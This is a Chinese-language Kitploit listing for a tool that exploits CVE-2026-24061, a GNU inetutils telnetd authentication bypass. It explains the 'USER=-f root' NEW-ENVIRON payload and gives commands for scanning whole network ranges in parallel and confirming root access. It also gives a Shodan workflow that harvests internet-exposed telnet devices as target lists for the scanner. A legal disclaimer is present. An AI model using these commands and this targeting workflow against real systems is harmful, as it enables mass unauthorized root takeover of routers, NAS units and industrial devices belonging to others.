Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
scan-cve-2026-24061 — 扫描 CVE-2026-24061 telnetd 认证绕过漏洞,生成载荷并验证易受攻击的 GNU inetutils telnetd 设备上的 root 访问权限。 | Kitploit
工具/GitHubGitHub/killsystema/scan-cve-2026-24061
侦察漏洞扫描器物联网安全漏洞利用网络安全渗透测试
GitHubkillsystema/scan-cve-2026-24061

scan-cve-2026-24061

扫描 CVE-2026-24061 telnetd 认证绕过漏洞,生成载荷并验证易受攻击的 GNU inetutils telnetd 设备上的 root 访问权限。

查看仓库
6个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-24061 扫描器 – GNU inetutils telnetd 认证绕过

⚠️ 非常重要的法律声明 ⚠️
本工具仅用于教育目的、安全研究、漏洞分析和授权测试。

  • 任何针对您不拥有或未经书面明确许可的系统的未授权使用均属犯罪行为(在巴西:刑法第 154-A 条 + 第 14.155/2021 号法律,以及其他国际法律)。
  • 仅在您自己的环境、受控实验室或已签署 RoE(交战规则) 的渗透测试/红队活动中使用。
  • 作者不对任何不当使用、损害、IP 封锁、法律后果或恶意利用承担责任。

关于漏洞(CVE-2026-24061)

  • 官方名称:GNU inetutils telnetd ≤ 2.7 – 认证绕过至 Root Shell
  • CVSS:9.8(严重)
  • 利用方式:通过 NEW-ENVIRON 选项发送 USER=-f root(或变体)可无需密码立即以 root 身份登录。
  • 受影响对象:仍使用 GNU inetutils telnetd(版本 ≤ 2.7)的物联网设备、老旧路由器、嵌入式系统、NAS、DVR、工业 PLC。
  • 2026 年 2 月状态:在野外被积极利用(自 2026 年 1 月起列入 CISA KEV,GreyNoise 检测到每日尝试)。

特别致谢

本扫描器得以实现,得益于 Hakai Security 团队发布的出色技术分析和概念验证。
他们详细的分析文章为利用向量、真实 payload 以及易受攻击的 telnetd 行为提供了精确的技术基础。

→ 在此阅读完整分析:
https://hakaisecurity.io/cve-2026-24061-execucao-remota-de-codigo-no-telnetd-analise-tecnica-e-prova-de-conceito/research-blog/

非常感谢 Hakai Security 的透明度、技术质量以及对安全社区的贡献。你们帮助使该工具对负责任的研究更加精确和有用。

扫描器功能

  • 支持单个 IP、CIDR(/24、/16 等)以及包含目标列表的 .txt 文件
  • 自动检测 IPv4 分类地址类别(A/B/C),并对大型网络发出警告
  • 动态生成多个 payload(-f root、-f admin、带 --、-p 等的变体)
  • 可通过 --users 自定义用户列表(默认包含 root、admin、pi、ubuntu、debian 等)
  • 通过 id 和 whoami 进行真实 root 验证(--verify)
  • 捕获并显示 Telnet 横幅(--banner)
  • 在 23 端口提前检测 SSH(跳过测试以避免误报)
  • 并行执行(可通过 -w 调整)
  • 彩色输出:亮红色 + "!!! VULNERÁVEL !!!" 表示易受攻击
  • 优雅处理 Ctrl+C
  • 结果按 IP 排序保存为 JSON

安装

root@kitploit:~
# 推荐:使用 virtualenv
python3 -m venv venv-cve
source venv-cve/bin/activate

# 安装依赖
pip install telnetlib3 colorama

基本用法

root@kitploit:~
python3 scan-cve-2026-24061.py 192.168.1.0/24 --verify --banner -w 50

# 使用目标列表(例如:Shodan)
python3 scan-cve-2026-24061.py alvos.txt -w 80 -t 6 --users root admin -o resultados.json

# 专注于 root(更快)
python3 scan-cve-2026-24061.py 10.0.0.0/24 --users root --verify --banner -t 5

# 试运行(仅列出 IP)
python3 scan-cve-2026-24061.py 206.42.41.0/24 --dry-run

如何获取目标(以 Shodan CLI 为例)

root@kitploit:~
pip install shodan

# 使用您的 API 密钥初始化
shodan init SUA_API_KEY_AQUI

# 下载可能的目标
shodan download --limit 500 iot-gnu-telnet.json.gz 'port:23 ("GNU inetutils" OR "telnetd (GNU inetutils)") -ssh'

# 提取 IP
shodan parse --fields ip_str iot-gnu-telnet.json.gz > alvos.txt

# 扫描
python3 scan-cve-2026-24061.py alvos.txt --verify --banner

贡献

欢迎提交 Pull Request,前提是保持道德焦点并强化责任声明。 许可证 MIT 许可证 – 但再次强调:未经授权的使用由用户自行承担全部责任。 为学习、提高意识和安全研究而制作。

⭐ 如果您觉得有用,请给个星标!

🛡️ 请极其负责任地使用。

Made with ❤️ by killsystema

下载工具